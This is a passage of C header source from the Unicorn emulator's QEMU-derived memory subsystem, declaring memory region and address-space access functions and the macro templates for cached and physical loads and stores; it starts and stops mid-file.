 * @offset: the offset within memory region
 */
MemoryRegion *memory_region_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *offset);

/**
 * memory_region_set_readonly: Turn a memory region read-only (or read-write)
 *
 * Allows a memory region to be marked as read-only (turning it into a ROM).
 * Only useful on RAM regions.
 *
 * @mr: the region being updated.
 * @readonly: whether the region is to be ROM or RAM.
 */
void memory_region_set_readonly(MemoryRegion *mr, bool readonly);

/**
 * memory_region_get_ram_ptr: Get a pointer into a RAM memory region.
 *
 * Returns a host pointer to a RAM memory region (created with
 * memory_region_init_ram() or memory_region_init_ram_ptr()).
 *
 * Use with care; by the time this function returns, the returned pointer is
 * not protected by RCU anymore.  If the caller is not within an RCU critical
 * section and does not hold the iothread lock, it must have other means of
 * protecting the pointer, such as a reference to the region that includes
 * the incoming ram_addr_t.
 *
 * @mr: the memory region being queried.
 */
void *memory_region_get_ram_ptr(MemoryRegion *mr);

/**
 * memory_region_add_subregion: Add a subregion to a container.
 *
 * Adds a subregion at @offset.  The subregion may not overlap with other
 * subregions (except for those explicitly marked as overlapping).  A region
 * may only be added once as a subregion (unless removed with
 * memory_region_del_subregion()); use memory_region_init_alias() if you
 * want a region to be a subregion in multiple locations.
 *
 * @mr: the region to contain the new subregion; must be a container
 *      initialized with memory_region_init().
 * @offset: the offset relative to @mr where @subregion is added.
 * @subregion: the subregion to be added.
 */
void memory_region_add_subregion(MemoryRegion *mr,
                                 hwaddr offset,
                                 MemoryRegion *subregion);

/**
 * memory_region_add_subregion_overlap: Add a subregion to a container
 *                                      with overlap.
 *
 * Adds a subregion at @offset.  The subregion may overlap with other
 * subregions.  Conflicts are resolved by having a higher @priority hide a
 * lower @priority.  Subregions without priority are taken as @priority 0.
 * A region may only be added once as a subregion (unless removed with
 * memory_region_del_subregion()); use memory_region_init_alias() if you
 * want a region to be a subregion in multiple locations.
 *
 * @mr: the region to contain the new subregion; must be a container
 *      initialized with memory_region_init().
 * @offset: the offset relative to @mr where @subregion is added.
 * @subregion: the subregion to be added.
 * @priority: used for resolving overlaps; highest priority wins.
 */
void memory_region_add_subregion_overlap(MemoryRegion *mr,
                                         hwaddr offset,
                                         MemoryRegion *subregion,
                                         int priority);

/**
 * memory_region_filter_subregions: filter subregions by priority.
 *
 * Removes all of @mr's subregions, starting from the specified priority
 * @level.
 */
void memory_region_filter_subregions(MemoryRegion *mr, int32_t level);

/**
 * memory_region_get_ram_addr: Get the ram address associated with a memory
 *                             region
 *
 * @mr: the region to be queried
 */
ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr);

/**
 * memory_region_del_subregion: Remove a subregion.
 *
 * Removes a subregion from its container.
 *
 * @mr: the container to be updated.
 * @subregion: the region being removed; must be a current subregion of @mr.
 */
void memory_region_del_subregion(MemoryRegion *mr,
                                 MemoryRegion *subregion);

/**
 * memory_region_find: translate an address/size relative to a
 * MemoryRegion into a #MemoryRegionSection.
 *
 * Locates the first #MemoryRegion within @mr that overlaps the range
 * given by @addr and @size.
 *
 * Returns a #MemoryRegionSection that describes a contiguous overlap.
 * It will have the following characteristics:
 * - @size = 0 iff no overlap was found
 * - @mr is non-%NULL iff an overlap was found
 *
 * Remember that in the return value the @offset_within_region is
 * relative to the returned region (in the .@mr field), not to the
 * @mr argument.
 *
 * Similarly, the .@offset_within_address_space is relative to the
 * address space that contains both regions, the passed and the
 * returned one.  However, in the special case where the @mr argument
 * has no container (and thus is the root of the address space), the
 * following will hold:
 * - @offset_within_address_space >= @addr
 * - @offset_within_address_space + .@size <= @addr + @size
 *
 * @mr: a MemoryRegion within which @addr is a relative address
 * @addr: start of the area within @as to be searched
 * @size: size of the area to be searched
 */
MemoryRegionSection memory_region_find(MemoryRegion *mr,
                                       hwaddr addr, uint64_t size);

/**
 * memory_listener_register: register callbacks to be called when memory
 *                           sections are mapped or unmapped into an address
 *                           space
 *
 * @listener: an object containing the callbacks to be called
 * @filter: if non-%NULL, only regions in this address space will be observed
 */
void memory_listener_register(MemoryListener *listener, AddressSpace *filter);

/**
 * memory_listener_unregister: undo the effect of memory_listener_register()
 *
 * @listener: an object containing the callbacks to be removed
 */
void memory_listener_unregister(MemoryListener *listener);

/**
 * memory_region_dispatch_read: perform a read directly from the specified
 * MemoryRegion.
 *
 * @mr: #MemoryRegion to access
 * @addr: address within that region
 * @pval: pointer to uint64_t which the data is written to
 * @op: size, sign, and endianness of the memory operation
 * @attrs: memory transaction attributes to use for the access
 */
MemTxResult memory_region_dispatch_read(struct uc_struct *uc, MemoryRegion *mr,
                                        hwaddr addr,
                                        uint64_t *pval,
                                        MemOp op,
                                        MemTxAttrs attrs);
/**
 * memory_region_dispatch_write: perform a write directly to the specified
 * MemoryRegion.
* * @mr: #MemoryRegion to access * @addr: address within that region * @data: data to write * @op: size, sign, and endianness of the memory operation * @attrs: memory transaction attributes to use for the access */ MemTxResult memory_region_dispatch_write(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, uint64_t data, MemOp op, MemTxAttrs attrs); /** * address_space_init: initializes an address space * * @as: an uninitialized #AddressSpace * @root: a #MemoryRegion that routes addresses for the address space */ void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root); /** * address_space_destroy: destroy an address space * * Releases all resources associated with an address space. After an address space * is destroyed, its root memory region (given by address_space_init()) may be destroyed * as well. * * @as: address space to be destroyed */ void address_space_destroy(AddressSpace *as); /** * address_space_remove_listeners: unregister all listeners of an address space * * Removes all callbacks previously registered with memory_listener_register() * for @as. * * @as: an initialized #AddressSpace */ void address_space_remove_listeners(AddressSpace *as); /** * address_space_rw: read from or write to an address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to read or write * @is_write: indicates the transfer direction */ MemTxResult address_space_rw(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, bool is_write); /** * address_space_write: write to address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to write */ MemTxResult address_space_write(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); /** * address_space_write_rom: write to address space, including ROM. * * This function writes to the specified address space, but will * write data to both ROM and RAM. This is used for non-guest * writes like writes from the gdb debug stub or initial loading * of ROM contents. * * Note that portions of the write which attempt to write data to * a device will be silently ignored -- only real RAM and ROM will * be written to. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: the number of bytes to write */ MemTxResult address_space_write_rom(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len); /* address_space_ld*: load from an address space * address_space_st*: store to an address space * * These functions perform a load or store of the byte, word, * longword or quad to the specified address within the AddressSpace. 
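 *
 * For example (an illustrative sketch, not part of the original header;
 * when UNICORN_ARCH_POSTFIX is defined the names below additionally carry
 * that per-arch suffix):
 *
 *   MemTxResult res;
 *   uint32_t v = address_space_ldl_le(uc, as, addr,
 *                                     MEMTXATTRS_UNSPECIFIED, &res);
 *   address_space_stl_le(uc, as, addr, v + 1,
 *                        MEMTXATTRS_UNSPECIFIED, &res);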
 * The _le suffixed functions treat the data as little endian;
 * _be indicates big endian; no suffix indicates "same endianness
 * as guest CPU".
 *
 * The "guest CPU endianness" accessors are deprecated for use outside
 * target-* code; devices should be CPU-agnostic and use either the LE
 * or the BE accessors.
 *
 * @as: #AddressSpace to be accessed
 * @addr: address within that address space
 * @val: data value, for stores
 * @attrs: memory transaction attributes
 * @result: location to write the success/failure of the transaction;
 *   if NULL, this information is discarded
 */

#ifdef UNICORN_ARCH_POSTFIX
#define SUFFIX       UNICORN_ARCH_POSTFIX
#else
#define SUFFIX
#endif
#define ARG1         as
#define ARG1_DECL    AddressSpace *as
#include "exec/memory_ldst.inc.h"

#ifdef UNICORN_ARCH_POSTFIX
#define SUFFIX       UNICORN_ARCH_POSTFIX
#else
#define SUFFIX
#endif
#define ARG1         as
#define ARG1_DECL    AddressSpace *as
#include "exec/memory_ldst_phys.inc.h"

struct MemoryRegionCache {
    void *ptr;
    hwaddr xlat;
    hwaddr len;
    FlatView *fv;
    MemoryRegionSection mrs;
    bool is_write;
};

#define MEMORY_REGION_CACHE_INVALID ((MemoryRegionCache) { .mrs.mr = NULL })

/* address_space_ld*_cached: load from a cached #MemoryRegion
 * address_space_st*_cached: store into a cached #MemoryRegion
 *
 * These functions perform a load or store of the byte, word,
 * longword or quad to the specified address.  The address is
 * a physical address in the AddressSpace, but it must lie within
 * a #MemoryRegion that was mapped with address_space_cache_init.
 *
 * The _le suffixed functions treat the data as little endian;
 * _be indicates big endian; no suffix indicates "same endianness
 * as guest CPU".
 *
 * The "guest CPU endianness" accessors are deprecated for use outside
 * target-* code; devices should be CPU-agnostic and use either the LE
 * or the BE accessors.
 *
 * @cache: previously initialized #MemoryRegionCache to be accessed
 * @addr: address within the address space
 * @val: data value, for stores
 * @attrs: memory transaction attributes
 * @result: location to write the success/failure of the transaction;
 *   if NULL, this information is discarded
 */

#ifdef UNICORN_ARCH_POSTFIX
#define SUFFIX       glue(_cached_slow, UNICORN_ARCH_POSTFIX)
#else
#define SUFFIX       _cached_slow
#endif
#define ARG1         cache
#define ARG1_DECL    MemoryRegionCache *cache
#include "exec/memory_ldst.inc.h"

/* Inline fast path for direct RAM access.
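 * (Editorial note: the _cached helpers below test cache->ptr first; when
 * the cached section maps directly to host RAM they use a plain
 * ld*_p/st*_p access, and only call out to the *_cached_slow variants
 * declared above when the region is not direct RAM.)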
 */
#ifdef UNICORN_ARCH_POSTFIX
static inline uint8_t glue(address_space_ldub_cached, UNICORN_ARCH_POSTFIX)(struct uc_struct *uc, MemoryRegionCache *cache,
#else
static inline uint8_t address_space_ldub_cached(struct uc_struct *uc, MemoryRegionCache *cache,
#endif
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len);
    if (likely(cache->ptr)) {
        return ldub_p((char *)cache->ptr + addr);
    } else {
#ifdef UNICORN_ARCH_POSTFIX
        return glue(address_space_ldub_cached_slow, UNICORN_ARCH_POSTFIX)(uc, cache, addr, attrs, result);
#else
        return address_space_ldub_cached_slow(uc, cache, addr, attrs, result);
#endif
    }
}

#ifdef UNICORN_ARCH_POSTFIX
static inline void glue(address_space_stb_cached, UNICORN_ARCH_POSTFIX)(struct uc_struct *uc, MemoryRegionCache *cache,
#else
static inline void address_space_stb_cached(struct uc_struct *uc, MemoryRegionCache *cache,
#endif
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len);
    if (likely(cache->ptr)) {
        stb_p((char *)cache->ptr + addr, val);
    } else {
#ifdef UNICORN_ARCH_POSTFIX
        glue(address_space_stb_cached_slow, UNICORN_ARCH_POSTFIX)(uc, cache, addr, val, attrs, result);
#else
        address_space_stb_cached_slow(uc, cache, addr, val, attrs, result);
#endif
    }
}

#define ENDIANNESS   _le
#include "exec/memory_ldst_cached.inc.h"

#define ENDIANNESS   _be
#include "exec/memory_ldst_cached.inc.h"

#ifdef UNICORN_ARCH_POSTFIX
#define SUFFIX       glue(_cached, UNICORN_ARCH_POSTFIX)
#else
#define SUFFIX       _cached
#endif
#define ARG1         cache
#define ARG1_DECL    MemoryRegionCache *cache
#include "exec/memory_ldst_phys.inc.h"

/* address_space_translate: translate an address range within an address
 * space into a MemoryRegion and an address range within that region.
 * Should be called from an RCU critical section, so that the last
 * reference to the returned region does not disappear while the caller
 * is still using it.
 *
 * @fv: #FlatView to be accessed
 * @addr: address within that address space
 * @xlat: pointer to address within the returned memory region section's
 * #MemoryRegion.
 * @len: pointer to length
 * @is_write: indicates the transfer direction
 * @attrs: memory attributes
 */
MemoryRegion *flatview_translate(struct uc_struct *uc, FlatView *fv,
                                 hwaddr addr, hwaddr *xlat,
                                 hwaddr *len, bool is_write,
                                 MemTxAttrs attrs);

static inline MemoryRegion *address_space_translate(AddressSpace *as,
                                                    hwaddr addr, hwaddr *xlat,
                                                    hwaddr *len, bool is_write,
                                                    MemTxAttrs attrs)
{
    return flatview_translate(as->uc, address_space_to_flatview(as),
                              addr, xlat, len, is_write, attrs);
}

/* address_space_access_valid: check for validity of accessing an address
 * space range
 *
 * Check whether memory is assigned to the given address space range, and
 * access is permitted by any IOMMU regions that are active for the address
 * space.
 *
 * For now, addr and len should be aligned to a page size.  This limitation
 * will be lifted in the future.
 *
 * @as: #AddressSpace to be accessed
 * @addr: address within that address space
 * @len: length of the area to be checked
 * @is_write: indicates the transfer direction
 * @attrs: memory attributes
 */
bool address_space_access_valid(AddressSpace *as, hwaddr addr, hwaddr len,
                                bool is_write, MemTxAttrs attrs);

/* address_space_map: map a physical memory region into a host virtual address
 *
 * May map a subset of the requested range, given by and returned in @plen.
 * May return %NULL if resources needed to perform the mapping are exhausted.
 * Use only for reads OR writes - not for read-modify-write operations.
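 *
 * A typical map/copy/unmap sequence (an illustrative sketch, not part of
 * the original header):
 *
 *   hwaddr plen = len;
 *   void *p = address_space_map(as, addr, &plen, false,
 *                               MEMTXATTRS_UNSPECIFIED);
 *   if (p) {
 *       memcpy(buf, p, plen);    <-- plen may be smaller than len
 *       address_space_unmap(as, p, plen, false, plen);
 *   }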
* Use cpu_register_map_client() to know when retrying the map operation is * likely to succeed. * * @as: #AddressSpace to be accessed * @addr: address within that address space * @plen: pointer to length of buffer; updated on return * @is_write: indicates the transfer direction * @attrs: memory attributes */ void *address_space_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write, MemTxAttrs attrs); /* address_space_unmap: Unmaps a memory region previously mapped by address_space_map() * * Will also mark the memory as dirty if @is_write == %true. @access_len gives * the amount of memory that was actually read or written by the caller. * * @as: #AddressSpace used * @buffer: host pointer as returned by address_space_map() * @len: buffer length as returned by address_space_map() * @access_len: amount of data actually transferred * @is_write: indicates the transfer direction */ void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len); /* Internal functions, part of the implementation of address_space_read. */ MemTxResult address_space_read_full(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len); MemTxResult flatview_read_continue(struct uc_struct *, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr); void *qemu_map_ram_ptr(struct uc_struct *uc, RAMBlock *ram_block, ram_addr_t addr); static inline bool memory_access_is_direct(MemoryRegion *mr, bool is_write) { if (is_write) { return memory_region_is_ram(mr) && !mr->readonly; } else { return memory_region_is_ram(mr); } } /** * address_space_read: read from an address space. * * Return a MemTxResult indicating whether the operation succeeded * or failed (eg unassigned memory, device rejected the transaction, * IOMMU fault). Called within RCU critical section. * * @as: #AddressSpace to be accessed * @addr: address within that address space * @attrs: memory transaction attributes * @buf: buffer with the data transferred * @len: length of the data transferred */ #ifndef _MSC_VER static inline __attribute__((__always_inline__)) #else static inline #endif MemTxResult address_space_read(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; #ifndef _MSC_VER hwaddr l, addr1; void *ptr; MemoryRegion *mr; FlatView *fv; if (__builtin_constant_p(len)) { if (len) { fv = address_space_to_flatview(as); l = len; mr = flatview_translate(as->uc, fv, addr, &addr1, &l, false, attrs); if (len == l && memory_access_is_direct(mr, false)) { ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); memcpy(buf, ptr, len); } else { result = flatview_read_continue(as->uc, fv, addr, attrs, buf, len, addr1, l, mr); } } } else { result = address_space_read_full(as, addr, attrs, buf, len); } #else result = address_space_read_full(as, addr, attrs, buf, len); #endif return result; } #ifdef NEED_CPU_H /* enum device_endian to MemOp. */ static inline MemOp devend_memop(enum device_endian end) { QEMU_BUILD_BUG_ON(DEVICE_HOST_ENDIAN != DEVICE_LITTLE_ENDIAN && DEVICE_HOST_ENDIAN != DEVICE_BIG_ENDIAN); #if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) /* Swap if non-host endianness or native (target) endianness */ return (end == DEVICE_HOST_ENDIAN) ? 0 : MO_BSWAP; #else const int non_host_endianness = DEVICE_LITTLE_ENDIAN ^ DEVICE_BIG_ENDIAN ^ DEVICE_HOST_ENDIAN; /* In this case, native (target) endianness needs no swap. */ return (end == non_host_endianness) ? 
        MO_BSWAP : 0;
#endif
}
#endif

MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms);
MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr);
MemoryRegion *memory_map_io(struct uc_struct *uc, ram_addr_t begin, size_t size,
                            uc_cb_mmio_read_t read_cb, uc_cb_mmio_write_t write_cb,
                            void *user_data_read, void *user_data_write);
MemoryRegion *memory_cow(struct uc_struct *uc, MemoryRegion *parent, hwaddr begin, size_t size);
void memory_unmap(struct uc_struct *uc, MemoryRegion *mr);
void memory_moveout(struct uc_struct *uc, MemoryRegion *mr);
void memory_movein(struct uc_struct *uc, MemoryRegion *mr);
int memory_free(struct uc_struct *uc);

#endif

unicorn-2.1.1/qemu/include/exec/memory_ldst.inc.h

/*
 * Physical memory access templates
 *
 * Copyright (c) 2003 Fabrice Bellard
 * Copyright (c) 2015 Linaro, Inc.
 * Copyright (c) 2016 Red Hat, Inc.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #ifdef TARGET_ENDIANNESS extern uint32_t glue(address_space_lduw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl, SUFFIX)(struct uc_struct *, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_notdirty, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); #else extern uint32_t glue(address_space_ldub, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_lduw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_lduw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint32_t glue(address_space_ldl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern uint64_t glue(address_space_ldq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stb, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); extern void glue(address_space_stq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result); #endif #undef ARG1_DECL #undef ARG1 #undef SUFFIX #undef TARGET_ENDIANNESS 
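
/*
 * Illustrative note (an editorial sketch, not part of the original file):
 * memory_ldst.inc.h is a template.  Each includer defines SUFFIX, ARG1 and
 * ARG1_DECL before including it, and glue() pastes SUFFIX onto every
 * function name.  A hypothetical instantiation such as
 *
 *   #define SUFFIX    _mydev
 *   #define ARG1      as
 *   #define ARG1_DECL AddressSpace *as
 *   #include "exec/memory_ldst.inc.h"
 *
 * would declare address_space_ldub_mydev(), address_space_stl_le_mydev()
 * and friends, each taking the argument named by ARG1.  memory.h above
 * instantiates it once per address-space flavour.
 */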
unicorn-2.1.1/qemu/include/exec/memory_ldst_cached.inc.h

/*
 * Memory access templates for MemoryRegionCache
 *
 * Copyright (c) 2018 Red Hat, Inc.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifdef UNICORN_ARCH_POSTFIX
#define ADDRESS_SPACE_LD_CACHED(size) \
    glue(glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached)), UNICORN_ARCH_POSTFIX)
#define ADDRESS_SPACE_LD_CACHED_SLOW(size) \
    glue(glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached_slow)), UNICORN_ARCH_POSTFIX)
#define LD_P(size) \
    glue(glue(ld, size), glue(ENDIANNESS, _p))
#else
#define ADDRESS_SPACE_LD_CACHED(size) \
    glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached))
#define ADDRESS_SPACE_LD_CACHED_SLOW(size) \
    glue(glue(address_space_ld, size), glue(ENDIANNESS, _cached_slow))
#define LD_P(size) \
    glue(glue(ld, size), glue(ENDIANNESS, _p))
#endif

static inline uint32_t ADDRESS_SPACE_LD_CACHED(l)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 4 <= cache->len - addr);
    if (likely(cache->ptr)) {
        return LD_P(l)((char *)cache->ptr + addr);
    } else {
        return ADDRESS_SPACE_LD_CACHED_SLOW(l)(uc, cache, addr, attrs, result);
    }
}

static inline uint64_t ADDRESS_SPACE_LD_CACHED(q)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 8 <= cache->len - addr);
    if (likely(cache->ptr)) {
        return LD_P(q)((char *)cache->ptr + addr);
    } else {
        return ADDRESS_SPACE_LD_CACHED_SLOW(q)(uc, cache, addr, attrs, result);
    }
}

static inline uint32_t ADDRESS_SPACE_LD_CACHED(uw)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 2 <= cache->len - addr);
    if (likely(cache->ptr)) {
        return LD_P(uw)((char *)cache->ptr + addr);
    } else {
        return ADDRESS_SPACE_LD_CACHED_SLOW(uw)(uc, cache, addr, attrs, result);
    }
}

#undef ADDRESS_SPACE_LD_CACHED
#undef ADDRESS_SPACE_LD_CACHED_SLOW
#undef LD_P

#ifdef UNICORN_ARCH_POSTFIX
#define ADDRESS_SPACE_ST_CACHED(size) \
    glue(glue(glue(address_space_st, size), glue(ENDIANNESS, _cached)), UNICORN_ARCH_POSTFIX)
#define ADDRESS_SPACE_ST_CACHED_SLOW(size) \
    glue(glue(glue(address_space_st, size), glue(ENDIANNESS, _cached_slow)), UNICORN_ARCH_POSTFIX)
#define ST_P(size) \
    glue(glue(st, size), glue(ENDIANNESS, _p))
#else
#define ADDRESS_SPACE_ST_CACHED(size) \
    glue(glue(address_space_st, size), glue(ENDIANNESS, _cached))
#define ADDRESS_SPACE_ST_CACHED_SLOW(size) \
    glue(glue(address_space_st, size), glue(ENDIANNESS, _cached_slow))
#define ST_P(size) \
    glue(glue(st, size), glue(ENDIANNESS, _p))
#endif

static inline void ADDRESS_SPACE_ST_CACHED(l)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 4 <= cache->len - addr);
    if (likely(cache->ptr)) {
        ST_P(l)((char *)cache->ptr + addr, val);
    } else {
        ADDRESS_SPACE_ST_CACHED_SLOW(l)(uc, cache, addr, val, attrs, result);
    }
}

static inline void ADDRESS_SPACE_ST_CACHED(w)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 2 <= cache->len - addr);
    if (likely(cache->ptr)) {
        ST_P(w)((char *)cache->ptr + addr, val);
    } else {
        ADDRESS_SPACE_ST_CACHED_SLOW(w)(uc, cache, addr, val, attrs, result);
    }
}

static inline void ADDRESS_SPACE_ST_CACHED(q)(struct uc_struct *uc, MemoryRegionCache *cache,
    hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result)
{
    assert(addr < cache->len && 8 <= cache->len - addr);
    if (likely(cache->ptr)) {
        ST_P(q)((char *)cache->ptr + addr, val);
    } else {
        ADDRESS_SPACE_ST_CACHED_SLOW(q)(uc, cache, addr, val, attrs, result);
    }
}

#undef ADDRESS_SPACE_ST_CACHED
#undef ADDRESS_SPACE_ST_CACHED_SLOW
#undef ST_P

#undef ENDIANNESS

unicorn-2.1.1/qemu/include/exec/memory_ldst_phys.inc.h

/*
 * Physical memory access templates
 *
 * Copyright (c) 2003 Fabrice Bellard
 * Copyright (c) 2015 Linaro, Inc.
 * Copyright (c) 2016 Red Hat, Inc.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #ifdef TARGET_ENDIANNESS static inline uint32_t glue(ldl_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint64_t glue(ldq_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stq_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val) { glue(address_space_stq, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } #else static inline uint32_t glue(ldl_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(ldl_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldl_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static 